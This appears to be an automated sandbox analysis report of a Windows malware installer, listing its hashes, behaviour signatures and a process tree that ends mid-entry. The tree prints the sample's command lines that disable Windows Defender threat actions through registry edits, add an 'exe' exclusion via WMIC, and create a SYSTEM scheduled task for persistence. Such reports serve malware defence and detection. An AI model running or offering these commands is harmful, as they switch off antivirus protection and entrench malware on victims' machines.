Analysis

  • max time kernel
    98s
  • max time network
    105s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    14/09/2024, 03:20

General

  • Target

    00c86af51377887de78b38bae4c19facbf5b76b8d998e524ea0f2a96870e7507.exe

  • Size

    7.3MB

  • MD5

    2023e316f5b1c8d6b3713553d56664c6

  • SHA1

    4348f4623432f0e704454b381f7006d21755e26e

  • SHA256

    00c86af51377887de78b38bae4c19facbf5b76b8d998e524ea0f2a96870e7507

  • SHA512

    5526018960b2659a0d847d7ab6ba765735136bdb78f7fd7c5187b3e640fae517218f7df697c38781f1d8d65842b2fbf6dd27b6e435b54922c02327eac11e1ab8

  • SSDEEP

    196608:91OFP8jPT4cPZfKOATwqOPcqwE8+hltgqKGC:3OFP8jPfIWPcq5bfgTGC

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 17 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 33 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 54 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\00c86af51377887de78b38bae4c19facbf5b76b8d998e524ea0f2a96870e7507.exe
    "C:\Users\Admin\AppData\Local\Temp\00c86af51377887de78b38bae4c19facbf5b76b8d998e524ea0f2a96870e7507.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2928
    • C:\Users\Admin\AppData\Local\Temp\7zSF906.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3948
      • C:\Users\Admin\AppData\Local\Temp\7zSFAEA.tmp\Install.exe
        .\Install.exe /iEdidHWgeV "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:4868
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1156
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1376
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2240
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                • System Location Discovery: System Language Discovery
                PID:3688
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:3996
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4248
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                7⤵
                • System Location Discovery: System Language Discovery
                PID:4628
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:4792
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3924
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1500
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:4240
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2800
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                7⤵
                  PID:1792
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
              5⤵
              • Indirect Command Execution
              • Suspicious use of WriteProcessMemory
              PID:2292
              • C:\Windows\SysWOW64\cmd.exe
                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:4304
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:440
                  • C:\Windows\SysWOW64\gpupdate.exe
                    "C:\Windows\system32\gpupdate.exe" /force
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:2440
          • C:\Windows\SysWOW64\forfiles.exe
            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
            4⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:2304
            • C:\Windows\SysWOW64\cmd.exe
              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1260
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4940
                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:432
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /CREATE /TN "bTArmSeJIYcKxkniKL" /SC once /ST 03:22:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSFAEA.tmp\Install.exe\" yw /hLudidtGPe 525403 /S" /V1 /F
            4⤵
            • Drops file in Windows directory
            • Scheduled Task/Job: Scheduled Task
            PID:4936
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 936
            4⤵
            • Program crash
            PID:4592
    • C:\Users\Admin\AppData\Local\Temp\7zSFAEA.tmp\Install.exe
      C:\Users\Admin\AppData\Local\Temp\7zSFAEA.tmp\Install.exe yw /hLudidtGPe 525403 /S
      1⤵
      • Executes dropped EXE
      • Drops desktop.ini file(s)
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      PID:2952
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:1992
        • C:\Windows\SysWOW64\forfiles.exe
          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
          3⤵
          • Indirect Command Execution
          • System Location Discovery: System Language Discovery
          PID:3980
          • C:\Windows\SysWOW64\cmd.exe
            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
            4⤵
            • System Location Discovery: System Language Discovery
            PID:3164
            • \??\c:\windows\SysWOW64\reg.exe
              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              5⤵
                PID:3372
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
            3⤵
            • Indirect Command Execution
            PID:4104
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
              4⤵
              • System Location Discovery: System Language Discovery
              PID:1568
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                5⤵
                  PID:4068
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
              3⤵
              • Indirect Command Execution
              • System Location Discovery: System Language Discovery
              PID:3644
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                4⤵
                • System Location Discovery: System Language Discovery
                PID:4676
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:4648
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
              3⤵
              • Indirect Command Execution
              • System Location Discovery: System Language Discovery
              PID:2460
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                4⤵
                • System Location Discovery: System Language Discovery
                PID:584
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  5⤵
                    PID:1636
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                3⤵
                • Indirect Command Execution
                PID:4576
                • C:\Windows\SysWOW64\cmd.exe
                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:1460
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                    5⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Drops file in System32 directory
                    • System Location Discovery: System Language Discovery
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3168
                    • C:\Windows\SysWOW64\gpupdate.exe
                      "C:\Windows\system32\gpupdate.exe" /force
                      6⤵
                        PID:2188
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                2⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2628
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2704
                  • C:\Windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:4640
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                  3⤵
                    PID:1628
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                    3⤵
                      PID:3620
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                      3⤵
                        PID:440
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:3612
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                        3⤵
                          PID:1420
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                          3⤵
                            PID:2692
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                            3⤵
                              PID:1820
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2568
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                              3⤵
                                PID:2016
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:3836
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:244
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:1960
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                3⤵
                                  PID:2312
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                  3⤵
                                    PID:4384
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                    3⤵
                                      PID:412
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4964
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                      3⤵
                                        PID:792
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4636
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                        3⤵
                                          PID:3480
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:3984
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                            PID:2260
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4060
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4916
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                              PID:4128
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                                PID:3476
                                              • C:\Windows\SysWOW64\reg.exe
